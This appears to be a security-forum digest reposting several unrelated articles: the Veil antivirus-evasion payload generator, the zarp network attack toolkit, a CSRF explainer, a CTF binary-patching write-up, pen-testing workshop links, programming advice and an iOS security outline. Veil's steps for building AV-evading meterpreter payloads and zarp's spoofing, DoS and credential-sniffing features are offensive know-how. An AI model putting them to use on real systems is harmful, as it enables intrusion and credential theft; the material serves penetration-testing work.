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[h=1]Veil – A Payload Generator to Bypass Antivirus[/h]Posted by CTruncer on May 30, 2013 NOTE: Please, be kind, and don’t submit any payloads to VirusTotal. On nearly every assessment, pen testers have to fight a battle against antivirus solutions. The level of effort that goes into each “battle” relies on the AV solution, its definitions, etc. Researching methods to bypass antivirus solutions has been an interest of mine on and off for the past 6 months. About two months ago I started to take a more serious look in how I could take my recent research and turn it into something that more usable and useful. I set out with a couple goals: Bypass common AV solutions that I/we routinely encounter in most network environments Utilize payloads that are compatible with the Metasploit framework, and expand upon these in future releases Attempt to make each payload file as random as possible With these goals in mind, I continued researching methods of bypassing AV. Since I wanted to maintain metasploit compatibility, I chose to use shellcode generated by the metasploit framework, specifically msfvenom. To accomplish this, I began looking into other available research, which is where I discovered a number of interesting techniques that a variety of people, such as Dave Kennedy and Debasish Mandal, already began to develop. From their research, I learned about really interesting ways to inject shellcode into memory through python. These methods were the foundation of the rest of my research. Since the majority of our assessment are against predominantly Windows environments, it was important that the tool worked reliably against these systems. Since I chose to write the tool in Python, I had to figure out how to package the Python output files containing the obfuscated shellcode to execute on Windows without requiring Python to be installed on the target machine. One of the solutions I looked into was using Py2Exe. I knew other software used this method to convert their Python-based scripts or tools into an executable that could run on Windows and figured I could do the same. I began testing Py2Exe with the payload files I developed and was successful running the executables on various versions of Windows, so I stuck with that solution. The final part was for me to develop a tool that automated the payload generation process, and I’m happy to release Veil. Note: Please be sure to check out https://www.veil-evasion.com, Veil’s website for the latest tutorials, updates, and repo location. Veil is currently capable of using 7 different methods to make 21 different payloads, all of which result in meterpreter connections. Veil provides the user with the option of using either Pyinstaller or Py2Exe to convert their python payload into an executable. With Pyinstaller, Veil users and have their file converted into an executable all within Kali and does not require the use of a second VM/Machine. When using Py2Exe,Veil will generate three files to which are required to create the final executable; a payload file (in Python), a file with runtime instructions for Py2Exe, and a batch script which handles converting the payload file into an executable. To generate the final payload, copy the three output files to a Windows host with Python, Py2Exe, and PyCrypto installed and execute the batch script. This will build the final executable that is uploaded to the target. The executable file can be dropped anywhere, on any Windows system, as all required libraries are stored within the exe file. Once dropped on a system and executed, the payload will result in a meterpeter callback that is undetected by AV. I’ve tested the packaged executable against multiple AV solutions (MSE, Kaspersky, AVG, Symantec, and McAfee), on both test systems and “in the wild,” and have a very high success rate, bypassing detection in almost every circumstance. I hope that, by releasing this tool, I can enable others in the community to provide more effective assessments by allowing them to focus their efforts on security risks and spend less time bypassing ineffective security measures that wouldn’t deter an actual adversary. Setup: For Kali: Run the setup script (setup.sh) and follow the installation process. Once the setup script has completed, delete the setup script. For Windows (when using Py2Exe) Install Python 2.7 - (tested with x86 – Python 2.7 Release) Install Py2Exe - (py2exe - Browse /py2exe/0.6.9 at SourceForge.net) Install PyCrypto - (The Voidspace Python Modules) Instructions for Use: Run Veil from Kali and generate your payload. If using Pyinstaller, your payload will be converted into an executable and is available for immediate use. If using Py2Exe Move the payload.py along with its two accompanying files onto your Windows machine (that already has python and the other dependencies from above installed). All three files should be placed in the root of the directory Python was installed to (likely C:\Python27). Run the batch script to convert the Python payload into an executable format. [*]Place the payload file on your target machine through any means necessary! Future Direction: Research new methods of encrypting or obfuscating the payload. Research other languages with direct access to the Windows API for delivering the payload. Want to play with Veil? Feel free to do so. Download, clone, do anything you’d like with it. You can download Veil here - https://github.com/ChrisTruncer/Veil. I hope that it can help others on their tests just as it has helped me. Please, if anyone has additional functionality they would like to add, I’d love to have input from the community! To learn how to effectively use Veil on assessments, and other Red Team techniques, check out our class at Blackhat USA 2013! And check out our Pen Testing class as well! References: Dave Kennedy - http://www.trustedsec.com/files/BSIDESLV_Secret_Pentesting_Techniques.pdf Debasish Mandal - Debasish Mandal's Blog: Execute ShellCode Using Python Sursa: https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/
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Video Tutorial: Introduction to Web Application Pen-Testing Posted by webpwnized in Information Security on Jun 3, 2013 9:05:02 AM Instructors: Jeremy Druin (webpwnized), Conrad Reynolds, Adrian Crenshaw (Irongeek) Twitter: @webpwnized Title: ISSA KY Web Application Pen Testing Workshop Tools Used: Mutillidae 2.5.7 (hxxp://sourceforge.net/projects/mutillidae/), Burp Suite 1.5 Free Edition Recorded By: Adrian Crenshaw of irongeek.com The KY ISSA hosted a one-day web application pen testing workshop in support of the Johnny Long family (@ihackstuff) which many know from Hackers for Charity. The demonstrations were performed on Mutillidae 2.5; a deliberately vulnerable web application freely available on Sourceforge. Mutillidae 2.5 is developed by Jeremy Druin (aka webpwnized). It contains 42 vulnerabilities in many different context. It is a free download. The interception proxy used is Burp Suite 1.5 Free edition. Both Mutillidae and Burp-Suite may be installed on Windows or Linux. They may be installed on the same host or two different hosts (more realistic). Mac OSX is not officially supported but Mutillidae and Burp-Suite have been known to run well using MAMP and Java respectively. The workshop was done to support the Long family. Johnny Long is a well-known speaking and author otherwise known as "j0hnny" or "j0hnnyhax". He moved to Africa in order to build computer training facilities in Uganda. Donations are given by browsing to http://www.hackersforcharity.org/donate/ then clicking the “Make a one-time donation directly to the Long family” link. Topics which were generally covered were: Injection point identification, prefixes, suffixes, and context SQL Injection Cross Site Scripting / Beef Hooks HTML Injection JSON injection Authentication Bypass (SQLi) Authentication Bypass (Cookie Tampering) Local File Inclusion Remote File Inclusion Cross Site Request Forgery Web Shells Before the workshop began, students were expected to have Mutillidae and Burp-Suite installed and operational so these topic were not covered. However, the following pre-requisite videos cover these topics using older versions of Mutillidae. Installing and Using Burp Suite: Installing NOWASP Mutillidae on Samurai Linux: Installing XAMPP/Mutillidae on Windows: Note: The specific environment used in the class was Mutillidae 2.5 running on a Windows XP virtual machine and Burp-Suite 1.5 Free running on both the localhost and a Kali Linux host. All of the hosts were on a Virutal Box host only network. No software was installed on the host operation system. All demos were run from virtual guests. The modules were recorded in sections. Some sections covered speaker introductions, mentions of the ISSA hosts, and other material which was not related to the instruction. Therefore the instructional "parts" are not sequential. ISSA 2013 Web Pen-testing Workshop - Part 1 - Intro to Mutillidae, Burp Suite & Injection ISSA 2013 Web Pen-testing Workshop - Part 2 - SQL Injection ISSA 2013 Web Pen-testing Workshop - Part 3 - Uploading Web Shells via SQL Injection ISSA 2013 Web Pen-testing Workshop - Part 4 - Auth Bypass via SQLi & Cookie Tampering ISSA 2013 Web Pen-testing Workshop - Part 6 - Local/Remote File Inclusion ISSA 2013 Web Pen-testing Workshop - Part 7 - Webshells ISSA 2013 Web Pen-testing Workshop - Part 9 - HTML & Javascript Injection ISSA 2013 Web Pen-testing Workshop - Part 10 - Beef Hooks https://www.youtube.com/watch?v=t-44ZsaeIQE&feature=player_embedded ISSA 2013 Web Pen-testing Workshop - Part 12 - JSON Injection https://www.youtube.com/watch?v=d71YfVR1eWA&feature=player_embedded Sursa: https://community.rapid7.com/community/infosec/blog/2013/06/03/video-tutorial-introduction-to-web-application-pen-testing
Windows Meterpreter-less Post Exploitation Authored by Sanoop Thomas This whitepaper explores the post exploitation of Metasploit using a generic shell rather than the meterpreter shell. “Metasploit”ing the target machine is a fascinating subject to all security professionals. The rich list of exploit codes and other handy modules of Metasploit Framework make the penetrators’ life quite easier. It gives a ton of other options and toolsets for exploit development too. This document mainly explores the post exploitation modules with generic shell rather than meterpreter shell. Download: http://packetstormsecurity.com/files/download/121937/Windows_Meterpreterless_PostExploit.pdf Sursa: Windows Meterpreter-less Post Exploitation ? Packet Storm
Understanding and Validating Cross-site Request Forgery
Nytro posted a topic in Tutoriale in engleza
[h=1]Understanding and Validating Cross-site Request Forgery[/h] danielmiessler| June 11, 2013 - last edited June 13, 2013 [Corresponding slides available here. ] Cross-site Request Forgery--often written CSRF and pronounced "Sea-surf"--is a common web application vulnerability that's far too misunderstood. Having participated in countless information security interviews over the years, it's stunning to see the number of experienced professionals in our space who struggle even to describe how CSRF differs from XSS--let alone how to validate it or defend against it. This article will discuss the basics of the vulnerability, how to validate that it's present in real-world applications, and some common ways of defending against it. CSRF is currently (2013) #8 on the OWASP Top 10 list of web application vulnerabilities, and it can be described as follows: Cross-site Request Forgery is a vulnerability in a website that allows attackers to force victims to perform security-sensitive actions on the Internet without their knowledge.Let's try to unpack that. First, the vulnerability is on the server side, not on the client side. Second, it involves an attacker forcing a victim to perform a security-sensitive action. And finally, victims usually don't know the attack is taking place until much later--if ever. So what constitutes a "sensitive action"? Two things: 1) it has to result in a change, and 2) it has to be a change that matters. Examples include changing someone's salary, transferring money at a bank, updating someone's password, etc. Non-changes don't matter, and changing the background color of a webpage probably doesn't matter either. Forcing a user to execute these actions is done through the manipulation of their browser. There are several types of functionality that browsers execute for us when we visit a webpage--all without our knowledge. When visiting cnn.com, for example, there may be 100 different image requests that are performed by your browser, and none of them are the result of explicit action by the user. Automatic image loading, as well as script execution, work to the advantage of the attacker in the case of CSRF. With these types of automated actions, your browser isn't just requesting those resources on your behalf: they're actually sending your cookies for that resources domain out with each request. And cookies are proof to the receiving website that you are you. Image from linuxforu.com So we basically have a situation where your browser is constantly doing things on your behalf--such as sending requests for images and executing scripts--and your authentication information (cookies) are being sent along with each request. And if you spend a couple hours browsing online this has probably happened to you literally thousands of times. So, why is this a problem? Because if you visit a malicious website, they can create an image that looks like so: In other words, just by visiting some random website hosting cat pictures, your browser could attempt to load that image--thereby resulting in you transferring money to an attacker. How could they do that without your authorization? That's the problem--they had your authorization, because when you sent a request to somebankfrom1999.com you also sent your cookie for that site as well. And cookies are basically passwords for web applications. So, that's bad (thanks Egon). One thing that's interesting about this is that it's an abuse of trust that makes this possible--just like with XSS--only the opposite. With Cross-site Scripting you have the client running malicious JavaScript because it was served by a server it trusts, and with Cross-site Request Forgery you have the server executing sensitive actions because it was sent by a client it trusts. Validation My background is in vulnerability assessment and penetration testing, so I've seen a lot of real CSRF and a lot of what <em>looks like</em> real CSRF. Here are three ways to validate that you have the real thing. In order to have real CSRF you must have all of the following: You can make a change using it That change is sensitive The request that makes the change isn't unique I like the acronym "CSU" to remember those three. So, if a tool tells you you have CSRF because it pattern matched off of some sensitive name--like transfer.aspx, but you're not able to make a change to anything using that page or request--it's not a real CSRF vulnerability. It's also important to realize that the change must happen in a single request, i.e. it cannot be stopped by a CAPTCHA, or an additional authentication prompt, etc. If you can't make a change--and make it without hitting a deliberate interruption--then it's not CSRF. Similarly, if you can make a change to the page, but it's not to something that the business cares about--you also don't have a CSRF vulnerability. Notice I said something the business cares about. CSRF is a vulnerability that highlights the fact that the business knows best when it comes to impact. If you tell them that someone could do "X" to "Y" within the site, and the business knowledgably responds that it's not an issue for them--then it's not a significant vulnerability. Finally, both the above need to be true in addition to the request that makes it happen being non-unique. What does that mean? It means that the request that triggers the sensitive change (qualified above) must be able to be triggered by an attacker in a trap that is laid for the victim--either via an auto-submit form field or via an image load--etc. If such a request would fail due to defense on the server side--then you also don't have a vulnerability. So, before you write someone up as having a CSRF vuln, you need to be able to show that all three are true. Tools are great at pointing you in the right direction, but remember that you may need to validate all the steps above before you submit or accept CSRF as a valid vulnerability. Attack Vectors CSRF attacks work by getting users' browsers to unknowingly perform undesirable and sensitive actions. This happens by them arriving at a given website where malicious content exists, which is then executed by their browser. There are two main ways of doing this: Inserting malicious content into an existing site the victim will visit, e.g. a malicious image tag or form submission that executes on page load Creating a page of your own, hosting that malicious content there, and then enticing the victim to visit your own page In both cases the content in question will be executed and the actions will be performed. Common Defenses We talked about validating CSRF, and the key to defense lies in a couple of those checks, namely the ability to make a change in one request, and the ability for an attacker to build a request that will work on the server-side without being rejected for non-uniqueness. Let's take a look at those. You can defend your application by adding an additional step, or steps, to complete sensitive actions. This could be the completion of a CAPTCHA, an additional authentication challenge, or even just a confirmation that cannot be completed in an automated fashion. The key is stopping a single request from performing the action. 2. Another and perhaps more common way is to ensure that all requests to perform sensitive actions include unique identifiers that only legitimate clients will have, which prevents attackers from building valid requests that are then launched by unknowing victims. This usually takes the form of implementing a nonce within a hidden field of the form being sent. Combining XSS and CSRF The nonce defense mentioned above works because a valid request to the page, which yields a valid nonce, is required in order to build a legitimate request to the application. XSS can potentially be used to fetch the nonce, however, which can then be used in the subsequent CSRF request. This is what the Samy MySpace worm did. The Samy worm was code on a user's profile that, when visited, added Samy as the visitors friend and then copied the code to their profile. But MySpace had a CSRF request--the nonce requirement. Samy bypassed that by pulling the nonce first via XSS and then feeding that value into the CSRF request. Resources and Links CSRF Prevention Cheetsheet Understanding CSRF Slides (Slideshare) CSRF Tester (OWASP) CSRF Guard (OWASP) Daniel Miessler (GitHub) Summary Knowing the basics of Cross-site Request Forgery and how to validate that it's been found in real-world applications is a a good minimum for today's application security professionals. Remember the CSU acronymn for validation: The request in question must be able to make a change, that change must be sensitive, and must be non unique. For any comments or questions, please contact me at daniel.miessler@hp.com. Sursa: Understanding and Validating Cross-site Request Fo... - HP Enterprise Business Community -
[h=1]introducing zarp[/h]I've been quietly developing a local network attack tool for quite a while now, and it's approaching a state I deem 'presentable'. Bugs are still being ironed out, and tons of features are still planned, but I've gotten some great feedback over the past few months and decided it was time for an official introductory post. This post serves as an introduction into the current capabilities of the framework, as well as a timeline for future development and goals. zarp is a local network attack toolkit that emphasizes absolute control over local networks. It's end goal is to provide a very clean, modular, well-defined interface into a network, handing absolute control over to the user. Over the course of several months, I discovered myself having to harness one too many tools to perform very basic, and what should be, simple network exploitation. Mind you, zarp is not about exploiting hosts. It is merely about the manipulation of any and all traffic present on the local network, and allowing the user the ability to view it, manipulate it, and save it in any manner they desire. I would align zarp more with Ettercap than Metasploit. zarp is written in Python and makes an attempt to be as modular as possible while maintaining a high level of independence. As of now, three things are required to run zarp: Python 2.7.x, Linux, and Scapy. Because of Scapy's age, I've had to modify the source code explicitly for zarp, and thus Scapy comes packaged with zarp. I'm currently working to replace Scapy entirely and move to Python 3, but this won't be for awhile. Zarp modules are dynamically loaded at runtime, and a very basic, but useable, interface has been defined. It is incredibly easy to write a zarp module and get them loaded up into the framework. zarp's predominant interface is a CLI-driven GUI, as shown: bryan@devbox:~/zarp$ sudo ./zarp.py [!] Loaded 35 modules. ____ __ ____ ____ (__ ) / _\ ( _ \( _ ' / _/ / \ ) / ) __/ (____)\_/\_/(__\_)(__) [Version 0.1.3] [1] Poisoners [5] Parameter [2] DoS Attacks [6] Services [3] Sniffers [7] Sessions [4] Scanners 0) Back > Each module is loaded into one of six buckets. These buckets define the traits of the module and its intended use. Sessions [7] are how sessions are managed. Zarp allows a user to poison, sniff, and scan as many hosts as your system allows. This means that all of your network poisoning and sniffing can be performed all in one spot. > 0 7 [Running sessions] [1] ARP Spoof [0] [1] [2] Password Sniffer [0] |--> Logging to /tmp/passwords_49.txt [3] HTTP Server [0] HTTP Server [4] DNS Spoof [0] |-> [0] facebook.* -> [1] Stop session [2] View session [3] Start session logger [4] Stop session logger 0) As shown, many sessions can be managed from this interface at once. Each module defines how output is displayed when the user is 'viewing' the session; it could be network traffic, passwords, HTTP requests, and more. Various sniffers built in allow easy parsing and logging. Below are some of the built-in modules. ____ __ ____ ____ (__ ) / _\ ( _ \( _ ' / _/ / \ ) / ) __/ (____)\_/\_/(__\_)(__) [Version 0.1.3] [1] Poisoners [5] Parameter [2] DoS Attacks [6] Services [3] Sniffers [7] Sessions [4] Scanners 0) Back > 1 [1] ARP Spoof [2] DNS Spoof [3] DHCP Spoof [4] NBNS Poison [5] LLMNR Spoofer [6] ICMP Redirection 0) Back > 0 2 ____ __ ____ ____ (__ ) / _\ ( _ \( _ ' / _/ / \ ) / ) __/ (____)\_/\_/(__\_)(__) [Version 0.1.3] [1] DHCP Starvation [2] LAND DoS [3] IPv6 Neighbor Discovery Protocol RA DoS [4] Nestea DoS [5] SMB2 DoS [6] TCP SYN [7] IPv6 Neighbor Unreachability Detection DoS [8] Linux 2.6.36 - 3.2.1 IGMP DoS [9] MS13-018 Win7/8 DoS 0) Back > 0 3 ____ __ ____ ____ (__ ) / _\ ( _ \( _ ' / _/ / \ ) / ) __/ (____)\_/\_/(__\_)(__) [Version 0.1.3] [1] HTTP Sniffer [2] Password Sniffer [3] Traffic Sniffer [4] Database Sniffer [5] Packet Modifier 0) Back > Also included are various router exploits, switch flooding, ARP shells, access point cracking, and more. Zarp also allows modules to set CLI options, which can be used like any regular CLI application: bryan@devbox:~/zarp$ sudo ./zarp.py --help [!] Loaded 35 modules. ____ __ ____ ____ (__ ) / _\ ( _ \( _ ' / _/ / \ ) / ) __/ (____)\_/\_/(__\_)(__) [Version 0.1.3] usage: zarp.py [-h] [-q FILTER] [--update] [--wap] [--ftp] [--http] [--smb] [--ssh] [--telnet] [-w] [-s] [--service-scan] optional arguments: -h, --help show this help message and exit -q FILTER Generic network sniff --update Update Zarp Services: --wap Wireless access point --ftp FTP server --http HTTP Server --smb SMB Service --ssh SSH Server --telnet Telnet server Scanners: -w Wireless AP Scan -s Network scanner --service-scan Service scanner bryan@devbox:~/zarp$ sudo ./zarp.py --ssh [!] Loaded 35 modules. ____ __ ____ ____ (__ ) / _\ ( _ \( _ ' / _/ / \ ) / ) __/ (____)\_/\_/(__\_)(__) [Version 0.1.3] [!] Starting SSH Server... The idea behind services is this: honeypots are scary effective at what they do because they exploit a certain trust a user has in a system, or address. But, if I'm able to DoS a web server, ARPP/DNS spoof the host into redirecting it to me, I can fetch credentials off them just by presenting a login. These can be leveraged in any number of ways, including spoofing, social engineering, etc. I realize that many of these attacks are not bleeding-edge; that's okay, for now. I needed a solid foundation full of tried-and-true attacks that I can then expand upon; for this reason, I've gone for breadth over depth, initially. Modules are still being actively developed and features piled on. zarp is currently lacking a few key features, such as packet modification and ssl stripping, but these are currently in development. Moxie's sslstrip is fantastic, but I would prefer a native implementation without relying on twisted. Now comes the future; what's the end-goal for zarp. I see zarp as a master control system for a local network. Plug it in and watch it grow. Recently I've added a database logging tool that formats certain key bits, username/passwords, hosts, logs, etc., and inserts them into a local sqlite3 database. This will be expanded to eventually allow connections to postgresql/mysql servers for remote work and collaboration. The idea behind this is to allow a web application the ability to aggregate everything zarp spits out and organize, analyze, and display this in a very powerful way. This web application presents network topologies, host relationships, active connections, man-in-the-middle attacks, and more. The television to zarp's remote control. Though ambitious, I feel this could be an incredibly powerful tool that provides pentesters an invaluable service. I'm hoping this post garners a few users who can provide solid usage feedback and help iron out bugs or develop features; if you like what you've seen, please check out the wiki or send me an email (drone AT ballastsecurity DOT net) or tweet (@dronesec). Any and all feedback, including suggestions/bugs/questions, are welcome. You can check it out here; git clone https://github.com/hatRiot/zarp.git. Posted 3 weeks ago by drone Sursa: forelsket & security: introducing zarp
[h=1]Practical Exploitation - Effective NTLM / SMB Relaying[/h] Using ZackAttack, Responder and proxychains we can utilize relayed credentials more effectively than previously available. Here is a way to take this further:
Modifying a Binary File? In this post I will be talking about how I cracked one of the CTF challenges during the final semester in my university. The CTF competition was part of the Network Security course and was held for two days over a weekend in spring. Those two days were one of the most exciting times I have spent in front of a computer. The adrenaline rush of solving problems and getting points awarded is something that only the participants will know about. So, coming to the challenge I'm talking about. Given were: a program binary that provides encryption/decryption services, an encrypted message and the key that was used to encrypt the message. The challenge was to decrypt the encrypted message. But.... Decryption capability in the program binary was disabled! The program took the following command line arguments "Usage: ./crypt INPUT-FILE OUTPUT-FILE KEY (DECRYPT|ENCRYPT)". So if we mentioned "DECRYPT" it would output "NO DECRYPT ENABLED !!!". Okay, so I opened up the GNU debugger gdb. Started stepping through code to see where the command line arguments were processed. I observed that the function names were still preserved, although they were mangled because the C++ compiler implements name mangling. There were two functions, '_Z7decryptSsSs' and '_Z7encryptSsSs' apart from the 'main' function. Stepping one instruction at a time through the main function I found the code where the command line argument was being checked for DECRYPT/ENCRYPT. Here it is: Observe that the code is checking only whether the fifth argument's first character is 'D' or not. D is hex 44h. So if it is 'D' then register al is set and then the stack variable at [ebp-0x239] is also copied the value of al. The code then checks whether this value is zero, meaning 'E' was the first character of the fifth parameter, and then jumps based on this comparison. If the jump is not taken then the code calls std::cout to print the "NO DECRYPT ENABLED !!!" message and exits. When "ENCRYPT" was passed, jump was taken and the stack variable [ebp-0x236] was being used further down in the code when the decision was made to call either _Z7encryptSsSs() or _Z7decryptSsSs(). So the basic steps the code was taking is shown in this pseudo-code: main(){ // x = ebp-0x239 al = (argv[4][1] == 'D')? 1 : 0; x = al; if(x == 0) goto do_not_exit; std::cout << "NO DECRYPT ENABLED !!!\n"; exit_program do_not_exit: read input file read key file open output file if(x == 1) call _Z7decryptSsSs() else call _Z7encryptSsSs() exit_program } As you can see there are two places where the control flow changes. Two ideas came to my mind on that day. Control the stack variable 'x' so that the correct branches are taken even though "DECRYPT" is passed. Change the binary file so that the call to the encrypt() function gets replaced with a call to the decrypt() function. I chose the first option since it was easier. However I didn't quite succeed because the [ebp-0x239] was being over-written when some library functions were called. GDB has the functionality that enables you to monitor a memory location and break whenever a read/write operation is performed from/to that memory location. I tried using this but got tangled up in multiple places where this memory area was accessed. It was taking too much time. I then thought of the second option. For changing the binary file, all I had to do was to modify the target of the call instruction to point to the decrypt function instead of the encrypt function. The intel call instruction takes the target as an offset which means the call instruction simply does this to call a function: EIP = EIP+offset. See the disassembly below: The call instruction at 0x080494ee is "e3 e1 f8 ff ff". Call opcode is 0xe3 and the code_offset is 0xfffff8e1. All we have to do is replace the immediate value 0xfffff8e1 by the new offset 0xfffffa1b. This will be the new offset that the call instruction will use. Simple enough right? Well... sort of. This binary was a 32bit ELF binary. We can use "objdump -h" to find out the offset of important sections of a binary file. What we are interested in is the offset of the .text section. The output of "objdump -h" (only .text information shown here): The text section starts at offset 0xd20 in the binary file and its virtual address is 0x08048d20. The call instruction is at 0x08484ee. So, 0x08494ee - 0x08048d20 = 0x7ce. This is the distance between in the start of text section and the call to encryption routine instruction. Therefore, the call instruction is at offset 0xd20 + 0x7ce = 0x14ee in the binary file. The call instruction format is "opcode(1byte) code_offset(4bytes)". So we have to replace the integer(4bytes) at offset 0x14ee+1 with 0xfffffa1b. I wrote a program to do this by memory-mapping the binary and replacing the code_offset. Of course, we can simple open the file, seek to 0x14ee+1 and write an integer there but the reason I used memory mapping is because I wanted to see if I was modifying the correct place in the binary file and memory-mapping enables you to do this easily since you can view the file contents in the memory window of a debugger. Small snippet of the code to make the modification: WCHAR *szFile = L"C:\\Users\\Shishir\\CTF\\kes\\crypt";WCHAR *szOutFile = L"C:\\Users\\Shishir\\CTF\\kes\\crypt_new"; HANDLE hFile = NULL, hFileObj = NULL, hFileView = NULL; DWORD dwFileSize = 0; wprintf_s(L"Using input file: %s\n", szFile); if( ! fOpenAndMapFile(szFile, &hFile, &hFileObj, &hFileView, &dwFileSize) ) { wprintf_s(L"Error opening input file\n"); return 1; } unsigned char *fptr = (unsigned char*)hFileView; // Seek to offset where the call instruction's code_offset is fptr += 0x14ee + 1; unsigned int *iptr = (unsigned int*)fptr; int old_data = *iptr; int new_data = 0xfffffa1b; *iptr = new_data; Once this was done, I took the new modified binary and did an objdump of it and the call instruction at 0x08494ee was pointing to the decryption routine _Z7decryptSsSs() now!! Note the virtual address, 0x080494ee, is where the call instruction is in the following modified code and in the previous screenshot. Executed the program by giving "ENCRYPT" as the fifth argument and got the decrypted message in the output file! Now, this was possible because the decryption and encryption routines both had the same function signatures - same arguments especially - so the code that setup arguments on the stack before the call to _Z7encryptSsSs() did not have to be changed. Well, after submitting the flag and getting rewarded handsomely with points, I spoke to a fellow student who did it in a different, more easier, way. GDB allows you to control the contents of any register during debugging. So all you have to do is to make sure you break the program before each of the branching decision points and change the value of EIP register so that the correct branch is taken even though you specify "DECRYPT" at the command line. Anyway, it was fun playing around with gdb, objdump and the binary file even though my method was more complicated! This actually brings us to the topic of packers. A packer, in the context of computers and security, is a program that can compress and/or encrypt a binary file that is provided as input. This is how many of today's software programs are distributed in order to protect Intellectual Property. The compressed/encrypted binary is the one that is distributed to consumers. This supposedly prevents competitors and crackers from reverse engineering the binary and stealing the code implemented by a company. You might ask how the OS manages to run these 'packed' programs. When a binary file is packed, the unpacker is included as part of the final output of the packer. So executing the output binary file actually first invokes the unpacker which has the logic and information to unpack - decompress and/or decrypt - the rest of the binary and then execute the unpacked program. The unpacked program is usually run by creating a child process by the unpacker. UPX is a popular open-source packer. Even with packed a binary, we can still read the original code although it is a little more difficult. This difficulty arises because many packers are clever enough to not unpack everything at once. Unpacking may be done 'on-demand' and in-memory. So the challenge now is to determine when the unpacking process is finished and at this point we can dump the process's memory to disk for later analysis. The dump will hopefully have the whole binary in unpacked form to facilitate disassembly. This is why one must never ever depend on the fact that the source code will never be leaked. Remember, security through obscurity never works. The topic of packers and techniques for anti-packing and vice-versa is very interesting. I will write about it may be in a later post. That's it for now! Posted by Shishir Prasad at 01:31 Sursa: Ring0 - The Inner Circle: Modifying a Binary File?
[h=1]Advice to a New Programmer[/h]By Andrew Binstock, July 16, 2013 So much advice is heaped upon beginners that it can be hard to know where to start. However, these five practices are the foundation upon which everything else is built. Every few months, I receive a request by a new programmer who, with commendable diligence, wants to know how best to become a really good programmer. I also see this question a lot on programmer forums, which is a heartening trend. The most thoughtful answers tend to follow in similar channels to my thoughts on the subject, which suggests that there is indeed a certain basic agreement on fundamental best practices. I hasten to add, therefore, that these counsels are not original, but perhaps the color I add will provide additional insight. The beginner I have in mind has a basic understanding of how programming works, has written mostly small programs of varying complexity, and is heading off to either a career in the field or committed to excellence for his or own personal projects. There is only one truly foundational activity in programming: writing code. To be good at it, you're going to have to write a lot of code. That big body of work can be a vehicle for growth, or an exercise in repeatedly practicing a limited set of skills. To avoid the latter, you need to: Read a lot of code. Specifically, read a lot of code by excellent programmers. Not just good programmers, like the guy down the hall, but excellent ones. Due to the huge amount of open source today, this is easy to do. When I was learning Java, I read code from the Tomcat project and from the CI server, Cruise Control. I've read lots of good code since. It might be tempting to look for main() and start from there, but you're likely to spend a lot of time just reading set-up code and command-line parsing. I prefer to scan the filenames to look for some activity that interests me and then dig into those files. It's not crucial to understand the whole project or the ins and outs of the entire design, you'll wear yourself out doing this. Read the code. Look at the comments, see what the authors are doing, and how they went about it. Learn your tools thoroughly. I think the greatest loss of programming time is not in debugging or rewriting code, but in the innumerable seconds lost here and there by developers who don't really know their tools. I am referring to: the IDE, the language, the build system, and the VCS. Of these, the IDE and the language are by far the most important. You should, after a few weeks of practice, know almost every keystroke combo in the IDE, so that you touch the mouse only when it saves a lot of keystrokes. If you know the keystrokes, you know the commands. If you use the mouse only, you know only menus on which you tend to click on the same one or two entries. Knowing the IDE is pure discipline. Knowing large languages, such as Java or C++, takes more than discipline. They're huge, as are their libraries. Reading is the best approach, in my view. Read code that uses features you don't know and you'll look for opportunities to use them. Books (rather than blogs) are another excellent source. Read about features that are on the periphery of what you use currently, and soon you'll find the periphery expanding. Knowing the VCS and build systems make you a desirable team member — who doesn't waste time due of ignorance of important operations. Plan your code before you write it. I think this is the most difficult item on this list. In exchange, it probably delivers the most benefit. I'm not thinking of formal design — at your stage, that's unlikely to be necessary. But you do need to plan out the code in some manner other than carrying it around in your head. The simplest approach is to write up a small document (I frequently use a mind map): What are the requirements for this code? How will you implement it? What do I need to know that I don't know now? What are the objects I will need or need to create? And write this out. Only then begin to code, you'll find the code much easier to write, to document, and to get correct. Save your notes — they're great reference material. Write lots of code and have it reviewed. If your site does not do code reviews, do them yourself. Find the best programmer who'll give you useful advice in a way that can be heard and understood. Don't be a pest, but don't avoid the process because you're shy, busy, or feel you're good enough, etc. Code reviews should be part of your programming life. Be creative. Try pair programming with someone more senior than you for an afternoon. The important thing is that you need feedback that you cannot give yourself. Write tests as you code. This advice is perhaps the only controversial item here. It's not an endorsement of TDD. But it is an endorsement of knowing that your code works in most scenarios it will face. Start with unit tests and exercise new code with edge-case values. For example, does your function work if it is passed a negative value, or the maximum integer size? If not, does it throw an informative exception or just blow up? If not an exception, have you narrowed the range of inputs with asserts? If so, test the asserts. Use the planning you did earlier to write mocks, and then begin testing your new code with objects you still need to write. This will clarify design issues in your current code and the upcoming objects. Save your tests and run them prior to every check-in, so that they can be early warning systems for later code that breaks your current code. There's a lot more advice and many wise sayings that can be added to this list. But that's part of the problem: There's so much advice available that it's difficult to know exactly where to start. For that reason, I purposely limit my recommendations to just five points. If you apply them with diligence, you'll soon find two things: You'll be able to handle progressively larger and more important tasks, and you'll look back in embarrassment at code you wrote just a few months ago. Both experiences are sure signs of progress. Good luck! — Andrew Binstock Editor in Chief alb@drdobbs.com Twitter: platypusguy Sursa: Advice to a New Programmer | Dr Dobb's
iOS Security Page 3 Introduction Page 4 System Architecture Secure Boot Chain System Software Personalization App Code Signing Runtime Process Security Page 7 Encryption and Data Protection Hardware Security Features File Data Protection Passcodes Classes Keychain Data Protection Keybags Page 13 Network Security SSL, TLS VPN Wi-Fi Bluetooth Page 15 Device Access Passcode Protection Configuration Enforcement Mobile Device Management Device Restrictions Remote Wipe Page 18 Conclusion A Commitment to Security Page 19 Glossary Download: http://css.csail.mit.edu/6.858/2012/readings/ios-security-may12.pdf
